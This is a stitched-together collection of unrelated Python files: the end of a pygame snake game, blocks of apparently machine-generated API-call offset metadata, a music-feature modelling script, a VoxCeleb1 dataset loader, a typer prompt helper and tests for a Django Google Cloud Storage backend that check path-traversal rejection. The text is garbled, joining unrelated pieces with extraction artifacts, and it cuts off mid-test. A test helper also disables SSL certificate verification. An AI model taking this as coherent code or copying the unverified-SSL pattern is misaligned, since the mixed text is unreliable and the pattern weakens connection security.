elif pressed == 'Sound':
self.pages['Settings'].sound = not self.pages['Settings'].sound
for sound in SOUNDS.values():
sound.set_volume(1 if self.pages['Settings'].sound else 0)
elif pressed == 'Music':
self.pages['Settings'].music = not self.pages['Settings'].music
pygame.mixer.music.set_volume(1 if self.pages['Settings'].music else 0)
elif pressed == 'Menu':
self.pages['Menu'] = Menu(width, height, self.screen)
self.changePage('Menu')
elif pressed == 'Unpause':
self.changePage('Game')
elif pressed == 'Yes':
self.pages['Menu'] = Menu(width, height, self.screen)
self.changePage('Menu')
elif pressed == 'No':
self.changePage('Game')
elif pressed == 'Restart':
self.game = self.game.restart()
self.pages['Game'] = GameField(width, height, cell_size, self.screen)
self.pages['Game'].game = self.game
self.changePage('Game')
elif pressed == 'Quit':
return False
else:
self.update_flag = False
return True
def update(self):
self.pages[self.current_page].update()
pygame.display.flip()
def playMusic(self, page):
if not self.current_page == 'Settings' and not self.current_page == 'NotImplemented' and not self.current_page == 'Leaderboard':
if page == 'Game':
if self.current_page == 'Pause':
pygame.mixer.music.unpause()
else:
pygame.mixer.music.load(MUSIC[self.game.fps])
pygame.mixer.music.play(loops=-1)
elif page == 'Pause':
pygame.mixer.music.pause()
elif not page == 'Settings' and not page == 'NotImplemented' and not page == 'Leaderboard':
pygame.mixer.music.load(MUSIC[page])
pygame.mixer.music.play(loops=-1)
def loadLeaderboard(self, difficulty):
scores = []
try:
if difficulty == DIFFICULTY['Easy']:
file = 'resources/.easy'
elif difficulty == DIFFICULTY['Normal']:
file = 'resources/.normal'
elif difficulty == DIFFICULTY['Hard']:
file = 'resources/.hard'
with open(file, 'r') as f:
for line in f:
scores.append(int(line.strip()))
except:
scores = []
return scores
def saveLeaderboard(self, scores, difficulty):
if difficulty == DIFFICULTY['Easy']:
file = 'resources/.easy'
elif difficulty == DIFFICULTY['Normal']:
file = 'resources/.normal'
elif difficulty == DIFFICULTY['Hard']:
file = 'resources/.hard'
with open(file, 'w') as f:
for s in scores[:3]:
f.write(str(s) + '\n')
# Init
pygame.init()
pygame.display.set_caption('Python vs Android')
# Colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
GREY = (255, 255, 255, 80)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (255, 255, 0)
CYAN = (0, 255, 255)
MAGENTA = (255, 0, 255)
APPLE_COLORS = {
AppleTypes.NORMAL : RED,
AppleTypes.GOLDEN : YELLOW,
AppleTypes.LIFE : MAGENTA,
AppleTypes.SPECIAL : CYAN
}
# FPS
DIFFICULTY = {
'Easy' : 15,
'Normal' : 25,
'Hard': 35
}
# Controls
CONTROLS = ['Touch', 'Buttons', 'Inverted']
# Music
MUSIC = {
'Menu' : 'resources/intro.wav',
DIFFICULTY['Easy'] : 'resources/easy.wav',
DIFFICULTY['Normal'] : 'resources/normal.wav',
DIFFICULTY['Hard'] : 'resources/hard.wav',
'Pause' : None,
'Confirm' : None,
'GameOver' : 'resources/game_over.wav'
}
# Sounds
SOUNDS = {
'Apple' : pygame.mixer.Sound('resources/apple.wav'),
'Golden' : pygame.mixer.Sound('resources/golden.wav'),
'Life' : pygame.mixer.Sound('resources/life.wav'),
'Special' : pygame.mixer.Sound('resources/special.wav'),
'Hit' : pygame.mixer.Sound('resources/hit.wav'),
}
# Utils
ANIMATION_SPEED = 20
APPLE_EXPIRATION = 120
SNAKE_EXPIRATION = 40
SPECIAL_FRAMES = 3
# Adapt size to screen
width = pygame.display.Info().current_w
height = pygame.display.Info().current_h
CELL_COUNT_Y = 36
cell_size = int(height / CELL_COUNT_Y)
CELL_COUNT_X = int(width / cell_size)
ui = UserInterface(width, height, cell_size)
ui.changePage('Menu')
running = True
# Loop
while running:
if ui.current_page == 'Game':
running = ui.handleGame()
else:
running = ui.handle()
if ui.update_flag:
ui.update()
else:
ui.update_flag = True
else:
ui.pages['Settings'].saveSettings()
# Quit
pygame.quit()
|
[
"pygame.event.wait",
"pygame.event.get",
"pygame.display.Info",
"pygame.mixer.music.pause",
"random.randint",
"pygame.display.set_mode",
"pygame.mixer.music.play",
"pygame.draw.polygon",
"pygame.display.set_caption",
"android.vibrate",
"pygame.mixer.Sound",
"pygame.quit",
"pygame.Surface",
"pygame.init",
"pygame_sdl2.import_as_pygame",
"pygame.time.Clock",
"pygame.mixer.music.unpause",
"random.choice",
"pygame.display.flip",
"pygame.mixer.music.set_volume",
"pygame.mixer.music.load"
] |
[((19, 49), 'pygame_sdl2.import_as_pygame', 'pygame_sdl2.import_as_pygame', ([], {}), '()\n', (47, 49), False, 'import pygame_sdl2\n'), ((32136, 32149), 'pygame.init', 'pygame.init', ([], {}), '()\n', (32147, 32149), False, 'import pygame\n'), ((32150, 32197), 'pygame.display.set_caption', 'pygame.display.set_caption', (['"""Python vs Android"""'], {}), "('Python vs Android')\n", (32176, 32197), False, 'import pygame\n'), ((34016, 34029), 'pygame.quit', 'pygame.quit', ([], {}), '()\n', (34027, 34029), False, 'import pygame\n'), ((23191, 23210), 'pygame.time.Clock', 'pygame.time.Clock', ([], {}), '()\n', (23208, 23210), False, 'import pygame\n'), ((33075, 33116), 'pygame.mixer.Sound', 'pygame.mixer.Sound', (['"""resources/apple.wav"""'], {}), "('resources/apple.wav')\n", (33093, 33116), False, 'import pygame\n'), ((33137, 33179), 'pygame.mixer.Sound', 'pygame.mixer.Sound', (['"""resources/golden.wav"""'], {}), "('resources/golden.wav')\n", (33155, 33179), False, 'import pygame\n'), ((33198, 33238), 'pygame.mixer.Sound', 'pygame.mixer.Sound', (['"""resources/life.wav"""'], {}), "('resources/life.wav')\n", (33216, 33238), False, 'import pygame\n'), ((33260, 33303), 'pygame.mixer.Sound', 'pygame.mixer.Sound', (['"""resources/special.wav"""'], {}), "('resources/special.wav')\n", (33278, 33303), False, 'import pygame\n'), ((33321, 33360), 'pygame.mixer.Sound', 'pygame.mixer.Sound', (['"""resources/hit.wav"""'], {}), "('resources/hit.wav')\n", (33339, 33360), False, 'import pygame\n'), ((33496, 33517), 'pygame.display.Info', 'pygame.display.Info', ([], {}), '()\n', (33515, 33517), False, 'import pygame\n'), ((33537, 33558), 'pygame.display.Info', 'pygame.display.Info', ([], {}), '()\n', (33556, 33558), False, 'import pygame\n'), ((625, 676), 'random.choice', 'random.choice', (['[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 3]'], {}), '([0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 3])\n', (638, 676), False, 'import random\n'), ((753, 780), 'random.choice', 'random.choice', (['[0, 1, 2, 3]'], {}), '([0, 1, 2, 3])\n', (766, 780), False, 'import random\n'), ((2303, 2341), 'pygame.Surface', 'pygame.Surface', (['(cell_size, cell_size)'], {}), '((cell_size, cell_size))\n', (2317, 2341), False, 'import pygame\n'), ((5820, 5858), 'pygame.Surface', 'pygame.Surface', (['(cell_size, cell_size)'], {}), '((cell_size, cell_size))\n', (5834, 5858), False, 'import pygame\n'), ((11582, 11635), 'pygame.mixer.music.set_volume', 'pygame.mixer.music.set_volume', (['(1 if self.music else 0)'], {}), '(1 if self.music else 0)\n', (11611, 11635), False, 'import pygame\n'), ((23284, 23342), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(width, height)', 'pygame.HWSURFACE'], {}), '((width, height), pygame.HWSURFACE)\n', (23307, 23342), False, 'import pygame\n'), ((24317, 24335), 'pygame.event.get', 'pygame.event.get', ([], {}), '()\n', (24333, 24335), False, 'import pygame\n'), ((30429, 30450), 'pygame.display.flip', 'pygame.display.flip', ([], {}), '()\n', (30448, 30450), False, 'import pygame\n'), ((323, 358), 'random.randint', 'random.randint', (['(0)', '(CELL_COUNT_X - 1)'], {}), '(0, CELL_COUNT_X - 1)\n', (337, 358), False, 'import random\n'), ((380, 415), 'random.randint', 'random.randint', (['(0)', '(CELL_COUNT_Y - 1)'], {}), '(0, CELL_COUNT_Y - 1)\n', (394, 415), False, 'import random\n'), ((1024, 1239), 'random.choice', 'random.choice', (['[self.direction, self.direction, self.direction, self.direction, self.\n direction, self.direction, self.direction, (self.direction + 1) % 4, (\n self.direction + 2) % 4, (self.direction + 3) % 4]'], {}), '([self.direction, self.direction, self.direction, self.\n direction, self.direction, self.direction, self.direction, (self.\n direction + 1) % 4, (self.direction + 2) % 4, (self.direction + 3) % 4])\n', (1037, 1239), False, 'import random\n'), ((23799, 23820), 'pygame.display.flip', 'pygame.display.flip', ([], {}), '()\n', (23818, 23820), False, 'import pygame\n'), ((26369, 26388), 'pygame.event.wait', 'pygame.event.wait', ([], {}), '()\n', (26386, 26388), False, 'import pygame\n'), ((6309, 6344), 'random.randint', 'random.randint', (['(0)', '(CELL_COUNT_X / 2)'], {}), '(0, CELL_COUNT_X / 2)\n', (6323, 6344), False, 'import random\n'), ((6346, 6381), 'random.randint', 'random.randint', (['(0)', '(CELL_COUNT_Y / 2)'], {}), '(0, CELL_COUNT_Y / 2)\n', (6360, 6381), False, 'import random\n'), ((7135, 7155), 'android.vibrate', 'android.vibrate', (['(0.2)'], {}), '(0.2)\n', (7150, 7155), False, 'import android\n'), ((6459, 6509), 'random.randint', 'random.randint', (['(CELL_COUNT_X / 2)', '(CELL_COUNT_X - 1)'], {}), '(CELL_COUNT_X / 2, CELL_COUNT_X - 1)\n', (6473, 6509), False, 'import random\n'), ((6511, 6561), 'random.randint', 'random.randint', (['(CELL_COUNT_Y / 2)', '(CELL_COUNT_Y - 1)'], {}), '(CELL_COUNT_Y / 2, CELL_COUNT_Y - 1)\n', (6525, 6561), False, 'import random\n'), ((15636, 15686), 'pygame.draw.polygon', 'pygame.draw.polygon', (['self.surface', 'GREY', 'pointlist'], {}), '(self.surface, GREY, pointlist)\n', (15655, 15686), False, 'import pygame\n'), ((16010, 16060), 'pygame.draw.polygon', 'pygame.draw.polygon', (['self.surface', 'GREY', 'pointlist'], {}), '(self.surface, GREY, pointlist)\n', (16029, 16060), False, 'import pygame\n'), ((16409, 16459), 'pygame.draw.polygon', 'pygame.draw.polygon', (['self.surface', 'GREY', 'pointlist'], {}), '(self.surface, GREY, pointlist)\n', (16428, 16459), False, 'import pygame\n'), ((16809, 16859), 'pygame.draw.polygon', 'pygame.draw.polygon', (['self.surface', 'GREY', 'pointlist'], {}), '(self.surface, GREY, pointlist)\n', (16828, 16859), False, 'import pygame\n'), ((30720, 30748), 'pygame.mixer.music.unpause', 'pygame.mixer.music.unpause', ([], {}), '()\n', (30746, 30748), False, 'import pygame\n'), ((30791, 30836), 'pygame.mixer.music.load', 'pygame.mixer.music.load', (['MUSIC[self.game.fps]'], {}), '(MUSIC[self.game.fps])\n', (30814, 30836), False, 'import pygame\n'), ((30857, 30890), 'pygame.mixer.music.play', 'pygame.mixer.music.play', ([], {'loops': '(-1)'}), '(loops=-1)\n', (30880, 30890), False, 'import pygame\n'), ((30941, 30967), 'pygame.mixer.music.pause', 'pygame.mixer.music.pause', ([], {}), '()\n', (30965, 30967), False, 'import pygame\n'), ((17260, 17310), 'pygame.draw.polygon', 'pygame.draw.polygon', (['self.surface', 'GREY', 'pointlist'], {}), '(self.surface, GREY, pointlist)\n', (17279, 17310), False, 'import pygame\n'), ((17646, 17696), 'pygame.draw.polygon', 'pygame.draw.polygon', (['self.surface', 'GREY', 'pointlist'], {}), '(self.surface, GREY, pointlist)\n', (17665, 17696), False, 'import pygame\n'), ((18033, 18083), 'pygame.draw.polygon', 'pygame.draw.polygon', (['self.surface', 'GREY', 'pointlist'], {}), '(self.surface, GREY, pointlist)\n', (18052, 18083), False, 'import pygame\n'), ((18421, 18471), 'pygame.draw.polygon', 'pygame.draw.polygon', (['self.surface', 'GREY', 'pointlist'], {}), '(self.surface, GREY, pointlist)\n', (18440, 18471), False, 'import pygame\n'), ((31088, 31124), 'pygame.mixer.music.load', 'pygame.mixer.music.load', (['MUSIC[page]'], {}), '(MUSIC[page])\n', (31111, 31124), False, 'import pygame\n'), ((31141, 31174), 'pygame.mixer.music.play', 'pygame.mixer.music.play', ([], {'loops': '(-1)'}), '(loops=-1)\n', (31164, 31174), False, 'import pygame\n'), ((26747, 26805), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(width, height)', 'pygame.HWSURFACE'], {}), '((width, height), pygame.HWSURFACE)\n', (26770, 26805), False, 'import pygame\n'), ((27013, 27034), 'pygame.display.flip', 'pygame.display.flip', ([], {}), '()\n', (27032, 27034), False, 'import pygame\n'), ((29502, 29573), 'pygame.mixer.music.set_volume', 'pygame.mixer.music.set_volume', (["(1 if self.pages['Settings'].music else 0)"], {}), "(1 if self.pages['Settings'].music else 0)\n", (29531, 29573), False, 'import pygame\n')]
|
# Functions
from extract import extract
from model import model
import os
# Logging
import logging
logging.basicConfig(level=logging.INFO)
# Set directory
dir = '/Users/alexandrasmith/ds/metis/proj3_mcnulty/PROJ_FILES/major_or_minor_song_classification'
# filepath_to_music --> Edit as needed
filepath = 'sample_music_files'
# desired_clip_length --> Edit as needed (suggested: 30)
clip_sec = 30
# path_for_sliced_clips --> Edit as needed
export_path = 'sample_music_files_sliced'
def main(filepath_to_music, desired_clip_length, path_for_sliced_clips):
"""
Function that takes in music files,
extracts audio features, creates
pandas df, transforms data for
modeling, builds models, stores
performance of models
Takes in (1) a filepath to where the
music is stored, (2) the desired clip
length to build the models on, and (3)
the path to store the sliced clips
(which can be deleted after csv is
exported
:param filepath_to_music: str
:param desired_clip_length: int
:param path_for_sliced_clips: str
:return: None, exported df as csv,
exported df of models and performance
"""
global dir
logging.info('Extracting features...')
# Call extract() on filepath_to_music
data = extract(filepath_to_music, desired_clip_length, path_for_sliced_clips)
logging.info('Done with extraction.')
# Check if folder exists, if not, make it
if not os.path.exists(dir):
os.mkdir(dir)
# Export dataframe as csv
data.to_csv(os.path.join(dir, f'{desired_clip_length}_sec_data.csv'), index=False)
logging.info('Data exported to csv.')
logging.info('Building models...')
# Call model on extracted files
model_perf, holdout_perf = model(os.path.join(dir, f'{desired_clip_length}_sec_data.csv'))
# Export dataframes of performance as csv
model_perf.to_csv(os.path.join(dir, f'{desired_clip_length}_sec_performance.csv'), index=False)
holdout_perf.to_csv(os.path.join(dir, f'{desired_clip_length}_sec_holdout.csv'), index=False)
logging.info('Finished.')
return
if __name__ == '__main__':
main(filepath, clip_sec, export_path)
|
[
"os.mkdir",
"extract.extract",
"logging.basicConfig",
"os.path.exists",
"logging.info",
"os.path.join"
] |
[((101, 140), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (120, 140), False, 'import logging\n'), ((1180, 1218), 'logging.info', 'logging.info', (['"""Extracting features..."""'], {}), "('Extracting features...')\n", (1192, 1218), False, 'import logging\n'), ((1273, 1343), 'extract.extract', 'extract', (['filepath_to_music', 'desired_clip_length', 'path_for_sliced_clips'], {}), '(filepath_to_music, desired_clip_length, path_for_sliced_clips)\n', (1280, 1343), False, 'from extract import extract\n'), ((1349, 1386), 'logging.info', 'logging.info', (['"""Done with extraction."""'], {}), "('Done with extraction.')\n", (1361, 1386), False, 'import logging\n'), ((1611, 1648), 'logging.info', 'logging.info', (['"""Data exported to csv."""'], {}), "('Data exported to csv.')\n", (1623, 1648), False, 'import logging\n'), ((1653, 1687), 'logging.info', 'logging.info', (['"""Building models..."""'], {}), "('Building models...')\n", (1665, 1687), False, 'import logging\n'), ((2070, 2095), 'logging.info', 'logging.info', (['"""Finished."""'], {}), "('Finished.')\n", (2082, 2095), False, 'import logging\n'), ((1445, 1464), 'os.path.exists', 'os.path.exists', (['dir'], {}), '(dir)\n', (1459, 1464), False, 'import os\n'), ((1474, 1487), 'os.mkdir', 'os.mkdir', (['dir'], {}), '(dir)\n', (1482, 1487), False, 'import os\n'), ((1535, 1591), 'os.path.join', 'os.path.join', (['dir', 'f"""{desired_clip_length}_sec_data.csv"""'], {}), "(dir, f'{desired_clip_length}_sec_data.csv')\n", (1547, 1591), False, 'import os\n'), ((1762, 1818), 'os.path.join', 'os.path.join', (['dir', 'f"""{desired_clip_length}_sec_data.csv"""'], {}), "(dir, f'{desired_clip_length}_sec_data.csv')\n", (1774, 1818), False, 'import os\n'), ((1889, 1952), 'os.path.join', 'os.path.join', (['dir', 'f"""{desired_clip_length}_sec_performance.csv"""'], {}), "(dir, f'{desired_clip_length}_sec_performance.csv')\n", (1901, 1952), False, 'import os\n'), ((1991, 2050), 'os.path.join', 'os.path.join', (['dir', 'f"""{desired_clip_length}_sec_holdout.csv"""'], {}), "(dir, f'{desired_clip_length}_sec_holdout.csv')\n", (2003, 2050), False, 'import os\n')]
|
"""
Description: Dataset from VoxCeleb1
Author: <NAME>
Date: 2020.11.26
VoxCeleb1:
- From iden_split.txt to the training and validation set.
- From iden_split.txt to evaulate the identification task.
- From veri_test2.txt, list_test_all2.txt, and list_test_hard2.txt to
evaluate the corresponding verification task.
File Directory: voxceleb1/{speaker_id}/{utterance_id}/*.wav
Indices List:
- Speaker Identification: iden_split.txt
- Speaker Verification: veri_test2.txt, list_test_hard2.txt, list_test_all2.txt
List Template:
- iden_split.txt
| 3 | id10003/na8-QEFmj44/00003.wav |
| 1 | id10003/tCq2LcKO6xY/00002.wav |
| 1 | id10003/K5zRxtXc27s/00001.wav |
- veri_test2.txt, list_test_hard2.txt, list_test_all2.txt
| 1 | id10001/Y8hIVOBuels/00001.wav | id10001/1zcIwhmdeo4/00001.wav |
| 0 | id10001/Y8hIVOBuels/00001.wav | id10943/vNCVj7yLWPU/00005.wav |
| 1 | id10001/Y8hIVOBuels/00001.wav | id10001/7w0IBEWc9Qw/00004.wav |
"""
import os
from sugar.database import Utterance
from sugar.database import VerificationTrials
__all__ = ['idenset', 'veriset', 'veritrain']
idenlist = '/workspace/datasets/voxceleb/Vox1/iden_split.txt'
rootdir = '/workspace/datasets/voxceleb/voxceleb1'
verilist = '/workspace/datasets/voxceleb/Vox1/veri_split.txt' # create as the official mentioned
veritest2 = '/workspace/datasets/voxceleb/Vox2/veri_test2.txt'
veriall2 = '/workspace/datasets/voxceleb/Vox2/list_test_all2.txt'
verihard2 = '/workspace/datasets/voxceleb/Vox2/list_test_hard2.txt'
def idenset(listfile=idenlist, rootdir=rootdir, read_func=None, num_samples=48000, num_eval=2, is_xvector=True):
"""
Load VoxCeleb1 training set, and identification test set.
iden_split.txt to the training, validaton, and test sets.
Return
------
train : Utterance
val : Utterance
test : Utterance
spks : dict
is_xvector : bool
'x-vector' or 'd-vector'
"""
TRAIN_TYPE = 1
VAL_TYPE = 2
TEST_TYPE = 3
datalst = []
spks = []
with open(listfile, 'r') as f:
while True:
line = f.readline()
if not line:
break
line = line.replace('\n', '')
split_type, wav_path = line.split(' ')
spks.append(wav_path.split('/')[0])
split_type = int(split_type)
wav_path = os.path.join(rootdir, wav_path)
datalst.append([split_type, wav_path])
# create speaker dictionary
spks = list(set(spks))
spks.sort()
spks = {spk: idx for idx, spk in enumerate(spks)}
print('The "read" method of dataset is', read_func)
# split train part
trainlst = [wav for t, wav in datalst if t == TRAIN_TYPE]
# split validation part
vallst = [wav for t, wav in datalst if t == VAL_TYPE]
# split test part
testlst = [wav for t, wav in datalst if t == TEST_TYPE]
# convert list to Utterance
train = Utterance(trainlst, num_samples)
val = Utterance(vallst, num_samples)
test = Utterance(testlst, num_samples if not is_xvector else 0, True, num_eval)
return train, val, test, spks
def veriset(test2=veritest2, all2=veriall2, hard2=verihard2, rootdir=rootdir, num_samples=48000, num_eval=2):
"""
Load VoxCeleb1 verification test set.
1. veri_test2.txt to test2,
2. list_test_hard2.txt to hard2,
3. list_test_all2.txt to all2.
These list file has the same root directory.
Return
------
veri_test2 : VerificationTrials
veri_all2 : VerificationTrials
veri_hard2 : VerificationTrials
wav_files : Utterance
Notes
-----
Utterance and VerificationTrials are both Dataset.
VerificationTrials:
{'label': int, 'enroll': str, 'test': str}
Utterance:
{'file': str, 'input': Tensor}
By try-and-error, 2 x 5-second segments is better within 20 seconds.
"""
# load multiple trials list
veri_test2 = VerificationTrials(test2, num_samples, True, num_eval, rootdir)
veri_hard2 = VerificationTrials(hard2, num_samples, True, num_eval, rootdir) if hard2 is not None and os.path.exists(hard2) else None
veri_all2 = VerificationTrials(all2, num_samples, True, num_eval, rootdir) if all2 is not None and os.path.exists(all2) else None
# create unique file list, and then convert to be a Utterance
wav_files = set()
for veri in [veri_test2, veri_hard2, veri_all2]:
if veri is not None:
wav_files |= set(veri.files)
wav_files = list(wav_files)
wav_files = Utterance(wav_files, num_samples, True, num_eval)
return veri_test2, veri_all2, veri_hard2, wav_files
def veritrain(listfile=verilist, rootdir=rootdir, num_samples=48000):
train, _, _, spks = idenset(listfile, rootdir, num_samples)
return train, spks
if __name__ == '__main__':
veri_test2, veri_all2, veri_hard2, wav_files = veriset()
print('# of utterances in Vox1-O: {:,}'.format(len(veri_test2.files)))
print('# of utterances in Vox1-E: {:,}'.format(len(veri_all2.files)))
print('# of utterances in Vox1-H: {:,}'.format(len(veri_hard2.files)))
print('# of utterances in Vox1-E/H: {:,}'.format(len(set(veri_all2.files) | set(veri_hard2.files))))
print('# of speakers in Vox1-O: {:,}'.format(len(set([utt.split('/')[-3] for utt in veri_test2.files]))))
print('# of speakers in Vox1-E: {:,}'.format(len(set([utt.split('/')[-3] for utt in veri_all2.files]))))
print('# of speakers in Vox1-H: {:,}'.format(len(set([utt.split('/')[-3] for utt in veri_hard2.files]))))
print('# of speakers in Vox1-E/H: {:,}'.format(len(set([utt.split('/')[-3] for utt in veri_all2.files]) | \
set([utt.split('/')[-3] for utt in veri_hard2.files]))))
print(1)
|
[
"sugar.database.VerificationTrials",
"sugar.database.Utterance",
"os.path.join",
"os.path.exists"
] |
[((3033, 3065), 'sugar.database.Utterance', 'Utterance', (['trainlst', 'num_samples'], {}), '(trainlst, num_samples)\n', (3042, 3065), False, 'from sugar.database import Utterance\n'), ((3076, 3106), 'sugar.database.Utterance', 'Utterance', (['vallst', 'num_samples'], {}), '(vallst, num_samples)\n', (3085, 3106), False, 'from sugar.database import Utterance\n'), ((3118, 3190), 'sugar.database.Utterance', 'Utterance', (['testlst', '(num_samples if not is_xvector else 0)', '(True)', 'num_eval'], {}), '(testlst, num_samples if not is_xvector else 0, True, num_eval)\n', (3127, 3190), False, 'from sugar.database import Utterance\n'), ((4146, 4209), 'sugar.database.VerificationTrials', 'VerificationTrials', (['test2', 'num_samples', '(True)', 'num_eval', 'rootdir'], {}), '(test2, num_samples, True, num_eval, rootdir)\n', (4164, 4209), False, 'from sugar.database import VerificationTrials\n'), ((4742, 4791), 'sugar.database.Utterance', 'Utterance', (['wav_files', 'num_samples', '(True)', 'num_eval'], {}), '(wav_files, num_samples, True, num_eval)\n', (4751, 4791), False, 'from sugar.database import Utterance\n'), ((4227, 4290), 'sugar.database.VerificationTrials', 'VerificationTrials', (['hard2', 'num_samples', '(True)', 'num_eval', 'rootdir'], {}), '(hard2, num_samples, True, num_eval, rootdir)\n', (4245, 4290), False, 'from sugar.database import VerificationTrials\n'), ((4364, 4426), 'sugar.database.VerificationTrials', 'VerificationTrials', (['all2', 'num_samples', '(True)', 'num_eval', 'rootdir'], {}), '(all2, num_samples, True, num_eval, rootdir)\n', (4382, 4426), False, 'from sugar.database import VerificationTrials\n'), ((2468, 2499), 'os.path.join', 'os.path.join', (['rootdir', 'wav_path'], {}), '(rootdir, wav_path)\n', (2480, 2499), False, 'import os\n'), ((4316, 4337), 'os.path.exists', 'os.path.exists', (['hard2'], {}), '(hard2)\n', (4330, 4337), False, 'import os\n'), ((4451, 4471), 'os.path.exists', 'os.path.exists', (['all2'], {}), '(all2)\n', (4465, 4471), False, 'import os\n')]
|
"""Holds functions that ask a user for input"""
import warnings
from typing import List
import typer
from functions import logs
from functions import styles
from functions.config.models import FunctionConfig
from functions.constants import ConfigName
def ask(question: str, default: str = None, options: List[str] = None) -> str:
"""A string user prompt of the user in the console"""
if options:
question += f"{styles.yellow(' Options')}[{', '.join(options)}]"
return typer.prompt(
question,
default=default,
)
def confirm(question: str, default: bool = False) -> bool:
"""A boolean confirm prompt of the user in the console"""
return typer.confirm(question, default=default)
def confirm_abort(question: str) -> bool:
"""A boolean confirm prompt of the user in the console with a default abort action"""
return typer.confirm(question, abort=True)
def inform(msg: str, log: bool = True) -> None:
"""Informs a user with a message"""
if log:
logs.info(logs.remove_empty_lines_from_string(msg))
else:
typer.echo(msg)
def warn(msg: str, log: bool = True) -> None:
"""Warning a user with message"""
if log:
logs.warning(logs.remove_empty_lines_from_string(msg))
else:
warnings.warn(f"{styles.yellow('WARNING: ')}{msg}")
def fail(msg: str, log: bool = True) -> None:
"""Inform a user about a failed execution"""
if log:
logs.error(logs.remove_empty_lines_from_string(msg))
else:
warnings.warn(msg)
def prompt_to_save_config(config: FunctionConfig) -> None:
"""Asks the user if he wants to save the config in a function directory"""
store_config_file = confirm(
f"Do you want to store the configuration file ({ConfigName.BASE}) in the function's directory ({config.path})?",
default=True,
)
if store_config_file:
config.save()
|
[
"typer.echo",
"functions.logs.remove_empty_lines_from_string",
"typer.prompt",
"typer.confirm",
"warnings.warn",
"functions.styles.yellow"
] |
[((493, 532), 'typer.prompt', 'typer.prompt', (['question'], {'default': 'default'}), '(question, default=default)\n', (505, 532), False, 'import typer\n'), ((690, 730), 'typer.confirm', 'typer.confirm', (['question'], {'default': 'default'}), '(question, default=default)\n', (703, 730), False, 'import typer\n'), ((876, 911), 'typer.confirm', 'typer.confirm', (['question'], {'abort': '(True)'}), '(question, abort=True)\n', (889, 911), False, 'import typer\n'), ((1092, 1107), 'typer.echo', 'typer.echo', (['msg'], {}), '(msg)\n', (1102, 1107), False, 'import typer\n'), ((1527, 1545), 'warnings.warn', 'warnings.warn', (['msg'], {}), '(msg)\n', (1540, 1545), False, 'import warnings\n'), ((1032, 1072), 'functions.logs.remove_empty_lines_from_string', 'logs.remove_empty_lines_from_string', (['msg'], {}), '(msg)\n', (1067, 1072), False, 'from functions import logs\n'), ((1227, 1267), 'functions.logs.remove_empty_lines_from_string', 'logs.remove_empty_lines_from_string', (['msg'], {}), '(msg)\n', (1262, 1267), False, 'from functions import logs\n'), ((1467, 1507), 'functions.logs.remove_empty_lines_from_string', 'logs.remove_empty_lines_from_string', (['msg'], {}), '(msg)\n', (1502, 1507), False, 'from functions import logs\n'), ((431, 456), 'functions.styles.yellow', 'styles.yellow', (['""" Options"""'], {}), "(' Options')\n", (444, 456), False, 'from functions import styles\n'), ((1304, 1330), 'functions.styles.yellow', 'styles.yellow', (['"""WARNING: """'], {}), "('WARNING: ')\n", (1317, 1330), False, 'from functions import styles\n')]
|
# coding=utf-8
from __future__ import unicode_literals
import datetime
import ssl
from tempfile import TemporaryFile
import gcloud.exceptions
import pytest
from django.core.exceptions import SuspiciousFileOperation
from django.utils import six
from django.utils.crypto import get_random_string
from django_gcloud_storage import safe_join, remove_prefix, GCloudFile
def urlopen(*args, **kwargs):
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
try:
# Ignore SSL errors (won't work on Py3.3 but can be ignored there)
kwargs["context"] = ssl._create_unverified_context()
except AttributeError: # Py3.3
pass
return urlopen(*args, **kwargs)
@pytest.fixture
def storage(storage_object):
# Make sure there are no test files due to a previous test run
from django_gcloud_storage import prepare_name
for blob in storage_object.bucket.list_blobs():
storage_object.bucket.delete_blob(prepare_name(blob.name))
return storage_object
# noinspection PyClassHasNoInit,PyMethodMayBeStatic
class TestSafeJoin:
def test_should_join_urls(self):
assert safe_join("test", "index.html") == "test/index.html"
def test_should_not_break_on_slash_on_base(self):
assert safe_join("test/", "index.html") == "test/index.html"
assert safe_join("test///", "index.html") == "test/index.html"
def test_should_enforce_no_starting_slash_on_base(self):
assert safe_join("/test", "index.html") == "test/index.html"
assert safe_join("////test", "index.html") == "test/index.html"
def test_should_resolve_dots_to_absolute_path(self):
assert safe_join("test", "/test/../index.html") == "test/index.html"
def test_should_resolve_multiple_slashes(self):
assert safe_join("test", "/test//abc////index.html") == "test/test/abc/index.html"
assert safe_join("test///", "///test//abc////index.html") == "test/test/abc/index.html"
def test_should_not_allow_escaping_base_path(self):
with pytest.raises(SuspiciousFileOperation):
safe_join("test", "../index.html")
with pytest.raises(SuspiciousFileOperation):
safe_join("test", "/../index.html")
def test_should_work_with_bytes(self):
assert safe_join(b"test", "index.html") == "test/index.html"
assert safe_join("test", b"index.html") == "test/index.html"
assert safe_join(b"test", b"index.html") == "test/index.html"
def test_should_work_with_unicode_characters(self):
assert safe_join("test", "brathähnchen.html") == "test/brathähnchen.html"
def test_should_normalize_system_dependant_slashes(self):
assert safe_join("test", "windows\\slashes") == "test/windows/slashes"
assert safe_join("test", "windows\\/slashes") == "test/windows/slashes"
assert safe_join("windows\\", "slashes") == "windows/slashes"
def test_remove_prefix_function():
assert remove_prefix("/a/b/c/", "/a/") == "b/c/"
assert remove_prefix("/a/b/c/", "/b/") == "/a/b/c/"
# noinspection PyMethodMayBeStatic,PyTypeChecker
class TestGCloudFile:
TEST_CONTENT = "Brathähnchen".encode("utf8")
def test_should_be_able_to_read_and_write(self, monkeypatch):
monkeypatch.setattr(GCloudFile, "_update_blob", lambda: None)
f = GCloudFile(None)
f.open("w")
assert f.read() == (b"" if six.PY3 else "")
f.write(self.TEST_CONTENT)
f.seek(0)
assert f.read() == self.TEST_CONTENT
def test_small_temporary_files_should_not_be_rolled_over_to_disk(self, monkeypatch):
monkeypatch.setattr(GCloudFile, "_update_blob", lambda: None)
f = GCloudFile(None, maxsize=1000)
f.write("a".encode("utf8") * 1000)
assert not f._tmpfile._rolled
def test_large_temporary_files_should_be_rolled_over_to_disk(self, monkeypatch):
monkeypatch.setattr(GCloudFile, "_update_blob", lambda: None)
f = GCloudFile(None, maxsize=1000)
f.write("a".encode("utf8") * 1001)
